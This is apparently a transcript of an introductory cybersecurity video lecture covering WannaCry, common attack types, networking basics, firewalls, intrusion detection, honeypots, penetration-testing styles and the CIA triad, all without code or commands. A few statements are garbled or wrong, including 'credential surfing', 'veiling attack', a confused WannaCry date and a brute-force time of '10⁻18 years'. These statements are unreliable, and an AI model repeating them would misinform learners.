Hi, good morning. My name is Bipin Kulkarni and welcome back to the cybersecurity series of videos. In this video, we are going to look at a tutorial. We got an interesting lineup for this video. Here we are going to discuss about the rise of cybercrimes by giving examples. We're going to look at various scenarios where organizations have faced cybercrimes in the recent past, the different types of cyber attacks, the reasons for these cyber attacks, and then we are going to delve into what exactly is cybersecurity, what is expected out of us as cybersecurity experts to provide as a cybersecurity solution. Then we're going to look at some basic network terminologies which will help us understand cybersecurity and some of the terms that are utilized by experts when we deal with cybersecurity. The goals that we want to achieve. When I say I want to be secure, what exactly do I mean? When I want to secure an organization, what kind of security parameters are we looking at? Then we are going to look at different ways of tackling cybercrime in today's world. And lastly, we've got a very interesting demo on Metasploit where we are going to test a vulnerable machine and try to hack it. Now, Metasploit is a penetration testing tool widely used by security experts and hackers to test and try to penetrate different systems. So we have a very good demo on that, and we'll be looking at that at the end of this particular video. Let's begin with the rise in cybercrimes. So let's talk about WannaCry. This is something that happened way back in 2017. Let's not say way back, it's just 2019, 2 years back, and it took the world by storm. So it was a cyber attack which encrypted the data of organizations, and then the hackers held that organization ransom by demanding money from them to decrypt their own data. So what exactly happened? The attack originated in Asia and then spread across the rest of the world. Note the date. And how did this happen? There was a vulnerability that was identified in Microsoft Windows, the SMB vulnerability. SMB, which is server message block, is essentially the file sharing and the printer sharing services that you use in a LAN environment on Windows operating system. By default, these are enabled on your desktops, and there is a hardening guide that people utilize to either upgrade the version of SMB to a more secure version or to disable SMB and utilize something else. Now, this was a known vulnerability, and this was targeted. Within days. More than 230,000 computers were infected across 150 countries. Now, when we say this was identified, Microsoft knew of this vulnerability, and in fact, they had released a patch in April of 2017 to mitigate this vulnerability. Within 2 months of that release, this attack had happened. Now, in a real world scenario, it is not possible for all the servers and devices to be upgraded to the latest patch level because organizations need to test those patches to see if those patches are going to interfere with the services that they are providing. And hence, no organization will be completely patched up at any point in time. And this was the flaw that sadly took down a lot of organizations. The patch was available, but it was under testing. Some were not utilizing it yet, and they did not see it as a high value risk. And suddenly something happened and WannaCry took place. Now, what happened was a crypto worm called WannaCry, which basically encrypts the data and locks the user out of their own computers. And they get a screen in front of them which says your data has been encrypted, and it gives them a link, and they demand $300 to $600 to be paid to the hackers to retrieve the decryption key for their data. Now here, obviously you're not going to pay cash to hackers, neither are you going to make a bank transfer, because both of the ways you can identify the hackers and then pursue them. So the hackers demanded this exchange via bitcoins, cryptocurrency. This is the best way to remain anonymous and the best way to make payments over the internet without being identified. So what was the impact of the attack? Around 200,000 to 300,000 computers were infected. Now, it sounds like a small number of computers when we're talking about global. However, the services that it affected were huge. In UK, the National Health Service got affected. All the databases got encrypted. Surgeries and treatments of patients were postponed. FedEx, Renault, Nissan, all of these organizations got compromised, and their production lines basically shut down for a few days till they retrieved data from backup, started to restore, and then tried to bring back everything to normal. Then, in February 2019, Dunkin' Donuts announced that the users of their reward programs were targeted by a credential surfing attack. That means that the attackers stole the credentials, usernames, and passwords of customers of Dunkin' Donuts. Now, we think Dunkin' Donuts, they sell donuts. How much could it impact anyone? But if you have an online account with Dunkin' Donuts, you also have your personal identifiable information stored in those accounts. For example, your name, address, credit card information, maybe your social security number or your national insurance card or something like that, which can lead to identity theft. People can misuse that information, pretend to be you, and then take out loans or do transactions in your name where you are going to end up paying those bills. So stealing of such kind of data is going to impact all the users adversely. So the first name, last name, and email IDs were stolen. That is still good enough to launch social engineering attacks and target these victims to phishing attacks or similar attacks. So now let's look at the different types of attacks in cyber. So we are going to discuss these 6 malwares. We are going to talk about social engineering attacks, man-in-the-middle attacks, denial of service, SQL injections, and password attacks. Now if you look at this, malwares basically target hosts, operating systems. Social engineering attacks would address or attack the gullibility of a human being with the help of a computer. For example, sending a fake mail or hosting a fake website. Man-in-the-middle attack would target a network and then try to capture data packets within the network, thus compromising your credentials. A denial of service attack would crash a service. SQL injection attacks would attack an application, and a password attack would attack the usernames and passwords of accounts, thus taking advantage of weak passwords and getting access to your accounts. So let's start with malwares. Malware basically refers to malicious software. The first part of malicious, mal, and the ware out of software becomes malware. Malwares are nothing but vehicles in which hackers embed payloads. Payloads could be viruses, worms, ransomwares, trojans. So they hide these kind of malicious softwares within legitimate looking softwares and they post them on the internet. People who are interested in those kind of softwares will obviously download them, and since they are looking very legitimate, they will try to install them, thus accidentally and unknowingly installing a Trojan, virus, or a ransomware on their machine. Now, most of us have done this at one point in time where we have looked at pirated software because we did not want to pay for it. And then we probably go to torrents and then search for those softwares, download them, and there's a keygen.exe over there which we have to execute. And then we have to copy that code, the exe file that comes out of the keygen, and then we have to replace it. And I mean, it's a very convoluted process. But the fact that you have to restore some code with some other code would basically mean that there is something wrong with that file. So 99% of the time, these programs would have viruses or trojans embedded within them, and it is going to affect the security posture of your computers. If you scan keygen.exes with any antivirus across the globe, they will always report them as malwares, and they will probably want to delete those kind of files. So how do these get infected? It gets infected into a system when the user clicks on a suspicious link. Now, obviously, if you think it is a suspicious link, you're not going to click on it. But you trust the link or you're compelled to click on it just out of curiosity. Let's say you click on that link, there's a redirector, it downloads an attachment from a malicious server and it gets installed on your machine. Most of the common ways a virus or a worm is spread is through USB devices. People pass around USB devices like nobody's business, and you have no idea where that device has been used before, and you plug into your machine, and if there is a virus on that USB device, it will get infected on your machine as well. Then let's talk about social engineering attack. Now this is where your people skills come into the picture. This is the art of manipulating people and convincing them to give up confidential information, either knowingly or unknowingly. So most likely, we trust our friends, right? And we talk to them a lot and we give out some confidential information which we would not give out to others. What if somebody is pretending to be our friend just to get this information out of us? And we trust this person, we give out that information, and we suddenly get affected because of that. Now, I'm not saying that everybody in the world does that, but it is one of the most common attacks that is experienced in the computing world. Now, social engineering attacks can be broken down into 3 categories. First is a phishing attack. Don't worry about that figure over there. You're actually not going to go phishing. It's basically known as a phishing attack. Then there is a spear phishing attack, and then there's a veiling attack. All of these are types of social engineering attacks where you're targeting a user by sending out fake mails or fake websites, and their gullibility into clicking on those links and then giving out information. So what is a phishing attack? It is a practice wherein a hacker usually sends fake mails which look really genuine, or hosts fake websites which also look genuine and looks like they're from a trusted source. Once you click on those links, there would be embedded scripts or embedded malwares which would then be executed and then get installed on your machines, compromising the security of your device. These utilities could be used to steal credit card information, steal data from your computer, upload data to your computer, use your computer as a bot, and anything and everything that the hacker might want to do. Spear phishing is a variation of phishing. Now, phishing is a non-targeted attack. It is to the whole world at large. Whoever becomes a victim becomes a victim. However, spear phishing is a targeted attack. It is to a specific individual or to a group of individuals in an organization. So, it becomes a customized attack. You identify the victim, you identify the flaws that are existing over there in the organization, you identify the gullibility of the victim, create that fake mail to suit that particular situation, send it across to them. They'll click on that link and get infected by whatever payloads that you have embedded within it. Whaling is when you are targeting particularly wealthy or powerful people in the industry. So normally when you're targeting CEOs, CFOs, high-level management people of an organization, it would be known as a whaling attack. Then we come to the network attacks, man in the middle. This is also known as an eavesdropping attack, which literally means that you are going to listen in on to somebody's conversation. For example, in the figure, the client is trying to talk to the server, but you become a man in the middle and you try to listen in on the conversation that is going on. Now, obviously, the conversation over here may not be audio, but be data that is being exchanged between the server and the client. You just listen in, you make a copy of that data and you store it at your end. The data could contain usernames, passwords, may contain confidential information and help you compromise data. The attacking computer takes the IP address of the client. So you find out the IP address of the client. The client is not aware about this. The client is trying to communicate with the server. You spoof yourself as a default gateway or a trusted device, and the client thinks that it is through you that they need to communicate to the server, and thus they start sending data via your PC. So this attack normally happens on public Wi-Fi networks. I've seen that happening a lot, and thus I never recommend anyone using those public Wi-Fis. For example, you go to a coffee shop, they have free Wi-Fi over there, you connect to it and you start surfing, you start browsing. You are always signed into Google, Facebook accounts, your bank accounts and whatnot. And then there's a sniffer, there is a hacker who's doing a man-in-the-middle attack, capturing all that data. Now, it's not an easy attack, but it can be done. So this diagram shows where the man-in-the-middle attack has become successful, and now that the client and the server both are sending information via the attacker without knowing that the attacker is capturing all that data. Then comes the denial of service attack. The motive in a DOS attack is not to benefit monetarily, but to bring down a service for legitimate users, thus just causing harm to the organization. For example, if I consume the bandwidth of to a particular website, since there's no more bandwidth left, other legitimate users who want to interact with the website will not be able to connect to the website, thus creating a denial of service to those legitimate users. Now, it may not be possible for me to use my laptop to target a cluster of servers because obviously the bandwidth at the other end would be very high. So I would distribute my attack across multiple devices, thus creating a distributed denial of service, also called a DDoS attack. Then we come to the SQL injection, or SQL. SQL stands for Structured Query Language, which is the de facto language that is used by applications to interact with databases. So let it be a Microsoft SQL database, MySQL database, Oracle SQL. The syntax may be a little bit different, but it is still the structured query language that applications utilize to interact with the database. Now, the queries that are created by the applications need to be sanitized at the application level itself. So developers need to be very careful of how they are going to create those queries, what queries are allowed to go to the database, because a database is designed to answer queries. It doesn't know what is a legitimate query and what is a illegitimate query. If it receives a query, it is going to try to execute it and give out information. Thus, a hacker may insert malicious queries or malformed queries into a SQL server through the vulnerable application, causing a security event. So, depending on the queries that have been created, the attacker could delete some data or modify data, add data, edit it, or do anything that is malicious in nature that would compromise the integrity and the security of that database. For example, the Dunkin' Donuts, right? Except apart from being a credential attack, since they got access to the database, they could have added or deleted any information about any users that were there. Then we come to the most common attacks, password attacks. This is the easiest way to hack into a system by cracking a password of a user. This is done in multiple ways. So there would be a brute force attack where you try every permutation and combination out of the alphabet or the character set that is allowed to be utilized to create passwords. For example, we have password policies, right? Alphabet in uppercase and lowercase, so A through Z, capitals, and in lowercase 0 through 9, for numeric, and alphanumeric characters or special characters like exclamation marks, percentile, stars, ampersands, etc. So we are normally encouraged to create a randomized password with all of these utilized in a randomized manner. Should not be based on a dictionary word, should not be our names or our phone numbers in reverse. So why are these policies created? These policies are essentially created to create a password that is difficult to crack even by a brute force attack. So if you got a lengthy password which is very randomized and interspersed with numerics, alphanumerics, special characters and whatnot, it would be very difficult. Now this attack is 100% successful. That being said, the time it may consume and the compute level that it may consume may make this attack redundant. For example, a 16-character password, which is hashed using SHA-256, would take around 10⁻18 years to be cracked by a single PC. Now imagine the amount of time that takes. So it is 100% successful, but the time it takes may make it redundant. A dictionary attack is where you're creating a file which will have a list of all the common passwords that are utilized by users. So instead of the permutations and combinations of all the alphabets or all the characters, you're just creating a list of all the probable passwords that may be utilized, and then you're comparing those passwords to see if those passwords match. So these kind of attacks are effective against users who use very commonly used passwords, dictionary-based words as their passwords. Now let's talk about the types of network attacks. An active attack is an attack when the intruder attempts to disrupt the network's normalcy and modifies the data and alters the data at the same time. So as you can see in the diagram, there's a sender and there is a receiver. The attacker is the man in the middle who is now trying to create the active attack. So when the sender sends that data to the receiver, the attacker intercepts that data, modifies the data, and then sends the modified data to the receiver. Since the attacker is a man in the middle, as we have seen in the previous attacks, the receiver, neither the sender, would be aware of the attacker, and thus they would not be aware of the modification that has been done. In a passive attack, the intruder just eavesdrop on the data. They just listen in onto the conversation, but they do not modify the data at any time. So they just capture the packets, they copy the contents so that they can use that at a later stage. So we have seen all of these attacks so far, but what is the motivation behind them? Why would anyone want to create these attacks, and for what particular reasons? So let's talk about the reasons for cyber attacks. Let's start off with cyber terrorism. It is an attack carried out by a group of terrorists against nations to fulfill their agendas. Networks and computers are attacked. Crucial infrastructure of a company would be compromised, thus crippling their infrastructure, and then the terrorists would take advantage and demand ransom or whatever their cause is. Then cyber warfare. Nations hack into another nation's network to cause damage. By doing so, critical data is stolen and infrastructure can also be hampered. Now, this is where espionage happens. Countries are known to spy on each other, especially their enemies. And an enemy at any point in time would want to know what the other nations are doing. So earlier on, we used to look at spy movies where we used to plant spies and send spies across the borders, across the lands, and try to spy on them. Now we can do that sitting at home. Or rather, we can do that through our computers. And this is exactly what cyber warfare is. Cyber espionage. Here, technology is used to gain information without the consent from its owner. Now, this can be in a political situation or in a corporate situation where a competitor is trying to spy on their other vendors and trying to figure out how their business models are more successful or what their business strategies are, so that these guys can keep a step or two ahead of their competitors. And the most common of all, personal differences. Somebody hates somebody and they want to exact revenge, and that is why cyber attacks can take place as well. So this is why we want cybersecurity. Cybersecurity should be in place to prevent these kind of attacks. So what exactly is cybersecurity? It refers to the practice of protecting networks, programs, computer systems, and their components from unauthorized digital access and attacks. So whatever your digital footprint, could it be servers, computers, switches, routers, web servers, web applications that you're hosting over there, services that you're consuming from the cloud or providing to other customers, you need to secure all of these to ensure that the integrity and the confidentiality of these services is intact and none of these services are affected by any cyber attacks which could lead to disastrous results. So the main difference we want to understand here is the difference between cybersecurity and information security. Information security is data within the organization where they handle sensitive information or proprietary information, copyrighted or patented information, and they want to secure it from data leaks or having that data in somebody's computer's hands. Cybersecurity is basically a technique used to protect the integrity of networks. So this is when you're going to go on the web and on the internet, you're going to secure your devices that you have deployed, allowing people to access your infrastructure from the outside. So what could be the cost of not being cyber secure? If you get hacked, or if your data is compromised, or if your information is compromised, you could have a lot of repercussions. Your goodwill will go for a toss. You may be open for lawsuits, not only from clients, but from customers as well. You could be open for fines or penalties from government organizations for failing to follow the law of the land. Customer trust will obviously be hampered. If you've been hacked and your data has been compromised, you wouldn't want to deal with that organization in the future. All of this could land the organization in a financial crisis where all the lawsuits and penalties that are being imposed could basically bankrupt that organization and thus take it out of circulation. So now let's look at some basic terminologies which we need to understand to go further in the cybersecurity world. First and foremost, network. What is a network? Network is nothing but a group of interconnected devices. Could be servers, could be workstations, could be laptops, could be any devices, file printers and whatnot, to be interconnected with each other. As you can see in the diagram, it is used for communications. It's primarily used for data transmissions and to communicate between various terminals so that the business can go on. It is also used to share data and information. It could be wired or wireless. So you got a wired LAN, or at home we all have wireless networks where we connect all our devices. We use them for streaming videos. We use them to connect to the internet, surf websites, work from home. So we've got office also set up on our Wi-Fi. So a network is nothing but a collection of interconnected devices that are allowed to communicate each other freely so that the business can be continued in a proper manner. Server. A server is nothing but a hardware device that is supposed to handle requests of data information, allow network services to function from other computers and devices. So this is where we build a client-server relationship, where on the server we've got the major software, we got the data that is stored over there, and clients that interact with the server to consume that data in a particular manner that would help them make sense and analyze that data and generate business out of them. Then the internet. Internet is nothing but the collection of multiple networks globally. So all the networks that we have across the globe, when they are interconnected with each other, that is what internet is. And if we just go back and we talk about servers, this is what allows the internet to be formed. So every organizations, when they publish their servers on the internet and they allow everyone to interconnect through those servers, that is where the internet comes in, being the servers being the backbone of the internet. Obviously, for the servers to communicate with each other, we will need switches, routers, and other devices for the data transmissions to happen. So these are the multiple networks, could be individual networks, interconnected together would form the internet across the globe. For the internet to work, there would be a set of protocols for transmissions to be allowed across the globe. Now, this is where TCP/IP, or the Transmission Control Protocol over Internet Protocol, comes into the picture. So if you remember, we use communication channels like TCP, or the Transmission Control Protocol, and UDP, User Datagram Protocol. When we connect to web servers, we talk about the HTTP protocol and HTTPS protocol if we want it secure. Then we'll talk about IMAP, POP3, and all of these protocols. Now, where do these protocols come from? It is nothing but a suite of the TCP/IP software which contains all of these protocols which allow computers to communicate with each other. If TCP/IP wouldn't have been there, our network would have collapsed. Now, when we have TCP/IP and we want to communicate across the globe, how would we identify devices on the internet or even on the intranet? Because the devices don't know us. They are not going to use our usernames and passwords to communicate with each other. But when I want to connect to a website or a device, how do I identify it on the intranet or the internet? I obviously use IP addresses. Now, IP addresses are nothing but the internet protocol addresses, which are 32-bit addresses, which look exactly like the one shown on your screen, 172.16.254.1. Now, there is a lot of classification of IP addresses, and some of these IP addresses work on the internet. Some of them are supposed to work on private LANs, but we'll reserve that for a later topic. Then The second way that we are identified on the internet or the intranet are with MAC addresses. So media access controls or MAC addresses are hard-coded addresses that are given to our network interface cards. These cannot be modified physically at any point in time. However, there are techniques to spoof MAC addresses which we can then obfuscate our existing address and give us a new one. That would again be discussed in a later lecture. A router. We've been talking about routers and switches. A router is nothing but a device that passes packets back and forth across networks. It routes the data in the appropriate path. So it is an intelligent device. It can understand IP addresses and MAC addresses. It can identify different paths of reaching a particular network. For example, if I'm sitting in India and I want to communicate across the world to America, there would be a specific path that needs to be followed for my data packet to reach the other side of the world. It is the routers that would map this path, store it in their cache. So when I try to connect to that server, they would retrieve it from the cache and send the packet across the globe. So the home router that we use at home on Wi-Fi is our default gateway to connect to the internet, and thus it allows our internal devices to communicate with each other using internal IP addresses. And when we want to go to the internet, it will then route the traffic on the internet and send the packet to other servers that we want to communicate with. Now, what is a domain? A domain is referred to as a group of computers and other devices that are interconnected and treated as a whole. Now, a domain is used by an organization. So let's say if I am XYZ, XYZ being the name of the organization, and I want to create a domain which will allow me to create a group of interconnected computers for my employees to interconnect with each other and send and manage data. I'm going to create a domain for my organization and attach all the devices, create users and interconnect them using a domain. So this is where you're going to have a centralized approach of a server-client relationship where you're going to have a main domain and you're going to have devices connected to the domain. Now, when we go onto the internet, the domain name is nothing but the base part of a website name. So when you say google.com and you type it in your browser, you're taken to the web page called google.com, which is the search engine that you're connected. But for Google, the organization, at the other end, they would have a data center over there which would have all that relevant data which allows you to search through that information. So for them, the domain would be the internal part where they have got this cluster of servers creating a data center where all that information is stored. But for us as consumers, a website called google.com would be a domain for us to visit that particular website and consume the services that they're offering on the internet. So here the example is HTTPS, which means that it is a secure website, port 443, and we're connecting to cybersecurity.com. Cybersecurity.com becomes the domain name. HTTPS becomes the protocol that we want to utilize to connect to that particular website. Then we come across DNS or the domain name system. It is nothing but an index, something like a phone book, which is responsible for mapping the domain name into its corresponding IP address. Now remember, I said that there are only two ways we are identified on the internet or the intranet, either the IP address or the MAC address. If it is devices, if it is computers who are talking to each other, it would obviously be IP addresses. But if I type in google.com, I'm giving it a domain name. The internet does not understand domain names. So there is a DNS, a server, which is an index or works like an index or more like a phone book, which will have a list of all the domains with their corresponding IP addresses. So whenever I type in google.com, the request goes to a DNS server. The DNS server is queried. The IP address of google.com is identified, pasted onto the packet, and then the packet is routed through the router to the path that it has determined to reach the google.com server. Here, replace google.com with cybersecurity.com. So as you can see on the screen, the local PC queries the DNS server. The DNS server replies back with the IP address. Now, if you're wondering how does this work, if we're going to take an example of home networks, the ISP or the internet service provider gives us a default gateway or a router with their own IP addresses for DNS servers and default gateways. So when we try to connect through the router has the IP address of the DNS server and it routes that query to the DNS server. The DNS server replies back with the appropriate IP address. The router then takes that IP address, figures out the path and sends it across to the targeted server. DHCP or the Dynamic Host Configuration Protocol. It is a protocol that dynamically assigns IP addresses to the devices in the network. So we have discussed that IP addresses are required by computers to communicate within each other. But who associates or who gives these IP addresses to these computers? So for that to happen, we have got a DHCP server that is created. If you take your home networks, it is the router that has the DHCP role installed on it. So whenever a machine boots up, it sends out a broadcast request looking for the DHCP server, and then there's a communication with the DHCP server. The DHCP server then allocates an IP address to the computer who is requesting it, and once the IP address is allocated, an entry is made in the DHCP server's cache with the corresponding MAC address of that particular machine. Then we come to the next topic called VPN, or a virtual private network. It is a connection between a VPN server and a VPN client. It's basically an encrypted channel that you're creating between two endpoints. And the main reason for a VPN is to encrypt your data so that it is now no longer subject to man-in-the-middle or eavesdropping or modification attacks. So this is a layer of security that you're adding when you're connecting to the internet using an encrypted channel, which would prevent you from getting hacked or your data being compromised by hackers. So as you can see here, and if you remember the previous slides that we have seen, the hacker was able to copy the data very easily. Now that it is an encrypted channel, even if the hacker tries to eavesdrop and capture that data, it will be formatted in such a way that they would not be able to make sense out of it. Now the attacker or the hacker will have to try to decrypt the data. So that's another attack that they'll have to execute to find out the encryption key, decrypt the data, and then look at what the data was. Then we come across botnet. Now let's first understand what bots are. Bots are nothing but the softwares that can be installed on vulnerable machines that would allow the hacker to send commands to the infected machines to generate some traffic or to do what the command tells them to do. So most of the botnets are used for distributed denial of service attack. If you remember the DOS and DDoS that we discussed a while back, this is where we tie it up with how they are executed. So a bot master or a hacker, let's call them a hacker, would try to identify vulnerable devices across the internet and try to install the bot onto those devices. The bot essentially is a software that would revert back to the bot master and advertise their availability whenever they have been powered on. A collection of such infected devices would essentially be called a botnet. When there are enough number of machines that the attacker feels are good enough to launch that attack on the targeted servers, the hacker will then initiate those devices, send the commands through the bot master to the bots, and the bots would then generate that kind of traffic, whatever they have been configured for, and then attack the targeted server. Now, this is also done to mask the identity of the hacker. Since the attack is being generated through the botnet, the IP addresses of the botnet computers would be reported to the targeted server, not the actual hacker's IP address. So to figure out who the attacker was would be very much difficult depending on the size of the botnet. So this, you can see, is the attack that has been created over the victims, and the malicious traffic has been generated through the botnet and the victims have been targeted through that. So as said, once that traffic has been done, to forensically investigate at the victim's end, they would find the IP addresses of the botnet and not the attacker. Alright, let's start talking about network security controls. Network security controls are nothing but implementations of various devices to enhance the security of a particular network. These could be firewalls, intrusion detection systems, or intrusion prevention systems, honeypots, unified threat management systems, and so on and so forth. The next gen firewalls that we talk about, right? So let's look at a review of what these devices are. Now, a firewall can be a hardware or a software that is responsible for allowing or disallowing a certain amount of traffic to or from your computer. So these are basically created to enhance the security posture of your network, where you can configure them for certain level of traffic to be allowed or some traffic to be disallowed. Now, a firewall is not going to decide by itself what is a good amount of traffic or what is bad traffic. You're going to configure the firewall by creating rules based on IP addresses, port numbers, protocols, and what may. And based on this, the firewall will then analyze the traffic coming in or going out to the inbound or the outbound rules. And if the traffic is allowed, it will allow the traffic to go through. If there's an explicit rule which says deny the traffic, it will drop the packets or it will delete the packets. It will not allow the packets to go past it. So if it is good traffic, that means it matches a rule that has been created that allows that traffic to go through, the firewall will allow it. if it's bad traffic, that means that there is a rule which denies that traffic to pass through. It will get blocked at the firewall level itself. The firewall will not allow it to enter the network. Similarly, an intrusion detection system, it is designed to detect unauthorized access to systems or intrusion attempts as well. Now, it works along with the firewall, and the main thing is that here there's a database against which it can compare the traffic. So most of the attacks that we have talked about, there are some distinct signatures that would cause concern or that would highlight that kind of an attack. Most of the organizations try to develop these kind of signatures, have them in a database and store them on the IDS so that IDS can analyze the incoming traffic, look at patterns from the traffic coming in or going out, compare it to the database of the signatures that it has, and if it matches any of the signatures, it will then detect that as an attack and send an alert to the administrator, where the administrator will then have to manually come in and check it out. An intrusion prevention system, as described earlier or as mentioned earlier, can be configured to react to that particular event. So if it detects something that can be classified as an intrusion, an administrator can pre-configure it to react to that particular packet in a particular manner. For example, drop the packets or reflect them to a honeypot, or warn the administrator, or do all of these things at the same time. So as you can see on the diagram on the internet, there's a hacker, they send some the data packets come in. The firewall is not able to analyze the traffic because a firewall cannot analyze the contents of a packet. It can only look at the header, it can only look at the IP addressing and the ports that have been created, or the rules on which those things have been mentioned. And then it allows the data to go through. It reaches the IDS. The IDS then looks at two ways to scan. One is a signature that we've just spoken about, where the developer of the IDS creates those signatures and stores them onto the database, or another thing that is known as heuristic scanning, which is nothing but behavioral scanning. So it looks at the behavior of the data, and if the behavior looks malicious, it will then raise an alert and warn the administrator. Then let's come to honeypots. We just discussed in the previous slide that an IPS or an intrusion prevention system can be pre-configured that if it detects an anomaly or if it detects an intrusion, it may redirect the traffic to a honeypot. What is a honeypot? A honeypot is a decoy system. It is created to showcase a certain set of vulnerabilities to try to attract the attention of an attacker. Now, the word here is used as lure, but it's more to deceive the attacker. For example, if the attacker has been able to bypass your firewall and your IDS and now can scan the entire subnet, when they scan it, they would come across a device which is pretty vulnerable or showcases some vulnerabilities, which would definitely impress the hacker, because they would think that it is a vulnerable server which contains some valuable data. And that's exactly what honeypot is. It's a decoy server trying to act as a production server, trying to showcase that it has some valuable data, but also has some vulnerabilities in it, so that the attacker can be attracted towards it and spend some time trying to attack it or analyze the honeypot. At the same time, the honeypot will analyze the data traffic and it will warn the administrator of a possible intrusion, which will give the administrator enough time to secure the rest of the network, and will also get to analyze the logs of the honeypot to try to understand what kind of attacks the attacker is trying to create, and try to reverse engineer and identify the attacker at the same time. Let's talk about security testing. Security testing is nothing but a method which is carried out to identify threats and loopholes in a system. So here we are going to do a vulnerability analysis and penetration test. We may also go ahead and do a security audit. So what is vulnerability scanning, penetration testing, and security auditing? Vulnerability scanning is the activity which you're conducting to identify or look at possible weaknesses or issues or vulnerabilities or misconfigurations that exist in your infrastructure. So it is a proactive way where a team of security experts will launch a vulnerability scanner, scan certain devices that they have pre-identified, and once the report from the vulnerability scanner comes in, try to analyze the report and make sense out of it to see if there are any vulnerabilities that can be identified on those devices. This is obviously an ongoing process. Why? Because operating systems are patched, upgraded, new versions of softwares are released, and we keep on upgrading and we keep on changing our IT infrastructure ever so often. And hence, the IT infrastructure, like I say, is an ever evolving process. And to be abreast of all the latest vulnerabilities and threats, we need to do the vulnerability analysis in an ongoing manner to identify possible threats to the organization. So then what is penetration testing? Vulnerability analysis is just identifying the vulnerabilities, gaps, misconfigurations that may be in the organization's infrastructure. A penetration test is basically to validate whether those vulnerabilities that have been reported are real. If yes, how complex are they? What would be the impact? And what would be the technological impact, and what kind of data would be compromised, or what would be the end result of that attack if it actually happens in the real world. So here, a bunch of ethical hackers would simulate an attack from a hacker's perspective or from an insider's perspective, a malicious outsider or a malicious insider, depending on how they perceive the vulnerability as. And then they will try to test the vulnerability to see how it can be exploited, to what extent it can be exploited, and what would be the compromise or what would be the data leakage that would happen if this vulnerability gets exploited. So there are three ways a penetration test can be conducted. There is a black box testing, a gray box testing, and a white box testing. If you look at black box testing, this is where the tester, or the penetration tester rather, has no knowledge about the organization, their infrastructure, applications, or anything. So this is where you're simulating a hacker who's sitting on the outside, who has no knowledge about the organization. So they start from the information gathering phase, where they're going to try to figure out the IP addresses, the IP ranges, devices, operating systems, applications, and anything and everything that the organization is going to use, and then try to figure out vulnerabilities within them, and then try to attack those vulnerabilities. This is a very time consuming and a cost consuming audit. The second one is a gray box testing audit, where a partial knowledge is given to the penetration tester. So this simulates a regular user kind of an attack. So let's say if I'm a regular user in an organization, and when I say a regular user, I'm saying I'm not an administrator. So I have got limited access. And based on that limited access and the limited knowledge that I can gather about the infrastructure by being a regular employee, we are going to simulate a test with that knowledge to see whether an employee can take disadvantage of any vulnerabilities, and then try to worm their way into the organization's infrastructure and hack it. The white box testing, on the other hand, is where we're looking at an insider, a malicious insider who already has all the accesses, who already has all the controls in his hand. So simulating an administrative access and then trying to figure out whether this administrator can escalate their privileges and gain some other administrator's access and try to then compromise data. For example, even if I'm saying I'm an administrator, I am not the only administrator in the organization. There would be backup administrators, there would be system administrators, there would be the Active Directory administrators, there would be application administrators, database administrators, and so on and so forth. So every single component that we have may have a different administrator. For example, switches would have a different administrator. Same thing with firewalls or any other security controls that you have. So if I am a administrator for backup, can I then try to worm my way out, escalate my privileges as a regular administrator or a system administrator, and then crack their passwords, try to get access and manipulate some data? So these are the three types of penetration testing audits that you will come across. There would be some different subtypes, but every organization can customize these kind of audits to whatever they require. Then we come to security auditing. Security auditing is nothing but an internal check that is carried out by internal auditors. That means people who are employees within the organization to find out flaws in the organization's information system. Now, this is more on the compliance side. This may take inputs from the vulnerability assessment and the penetration test, but overall we want to see what kind of policies that we have in our organization, whether those policies are working properly, whether they make sense, are there any gaps, and based on the technical inputs from the VAPT team, how do we map with the policies that we have defined for that organization? For example, a password policy. Now we have documented that a password policy should be effective enough that passwords cannot be easily brute forced. So that's a high level policy. Then we dictate a procedure for that policy to be implemented, where we say, hey, we want the systems to be configured where the password meets some complexity standards. For example, should be uppercase and lowercase a through z, 0 through 9, should use special characters, and should be randomized password, should not be dictionary based or based on the user's name. Now, this is the policy that we have created and the procedures that we have defined. Are they being actually implemented in the real world? So a vulnerability analysis would determine whether the passwords are probably weak or not. So if the vulnerability report comes back and says the passwords are probably weak, then a penetration tester would go in and then try various attacks to see if passwords can be compromised. And if yes, they would then look at the complexity of the passwords, compare it to the procedures and the policies. And if they do not match, that's where your security auditing comes into the picture. So you're basically tying up the policy, the procedures, and the actual implementation that you have created in an organization. Let's talk about cybersecurity goals, CIA. And we are not talking about the Central Intelligence Agency here. We are talking about the CIA triad, which is confidentiality, integrity, and availability. This becomes the baseline for every security professional. At any point in time, it is the CIA that we are trying to implement in an organization to assure that our information security is at a very acceptable level. Now, what is confidentiality, integrity, and availability? Confidentiality is the aspect where we can manipulate the data, or we can configure the data to be accessible only to authorized people only. Now, when we say authorized, we basically are creating roles and responsibilities over here where I have to authorize some people access and not authorize some people not to access a certain amount of data, right? For example, if I have stored a data on a central store, like let's say everybody has a Dropbox or a OneDrive, right? And how do you protect your Dropbox or OneDrive? You have a username and password. You may enhance it by using a one-time password or multi-factor authentication to access the OneDrive, right? Now, that is where confidentiality comes in, where you're going to protect the data in such a way that it cannot be accessed by unauthorized users. So the first thing that you want to look at is how do you manage authorization? The second aspect, and we'll come back to confidentiality in a bit. The second aspect is integrity. That is the trustworthiness of that data. Now, if we are talking about the data that is stored on your OneDrive and we are keeping it confidential by giving it an authentication mechanism where you have to identify by using a username, then you have to give a password, and then an OTP is either emailed or sent to your mobile phone, right? And then you type in that OTP and then you access that data. Now, when you're accessing that data, how can you be sure that that data has not been modified by a hacker? Somebody may have gotten their hands on your password, they logged in and they accessed that data, they modified it, and that data is no longer trustworthy. So how do you maintain the integrity, the trustworthiness of that data? So here we use hashing algorithms where we take hash values of certain files and ensure that the integrity of that data is assured. Now, probably in the demo, I can show you what hashing is, and I'll give you a couple of examples of how hashing can be utilized for integrity management. And then the third aspect is availability. Now, the best way I can make my data confidential and trustworthy is I can lock it up in a safe, take it to the ocean, drop it in at the bottom of the ocean, and nobody can access it. But the data that is not accessible by anyone or any authorized person when they require it has no value. So for the data to be valuable for me, I need to have access to that data whenever I require it, I being that authorized person, right? So when we want to look at this, we are basically juggling along this triangle where we want to keep the security in such a way where the data is confidential, it's trustworthy, and at the same time it is highly available to all the authorized users as and when they want it. Now, when we implement this, there would be other scenarios or other concepts that would come into the picture. For example, IAAA. Now, when we say confidentiality, right, and we talked about authorization. So the first thing of authorization is how do we authorize people? So for authorization, we need to identify them, right? So that's what IAAA does. I stands for identification, A for authentication, authorization, and the last A for accountability. Now, even if I'm authorized to access that data, I need to be held accountable for the actions that I have taken. So there would be logs that would be created and stored which will keep track of what my activities have been. So if I do something malicious, the logs will point it out, and even at a later point in time, someone can come in and investigate, and those logs would tell them that something incorrect has happened. Now, coming back to confidentiality, when I say I authorize a person, let's 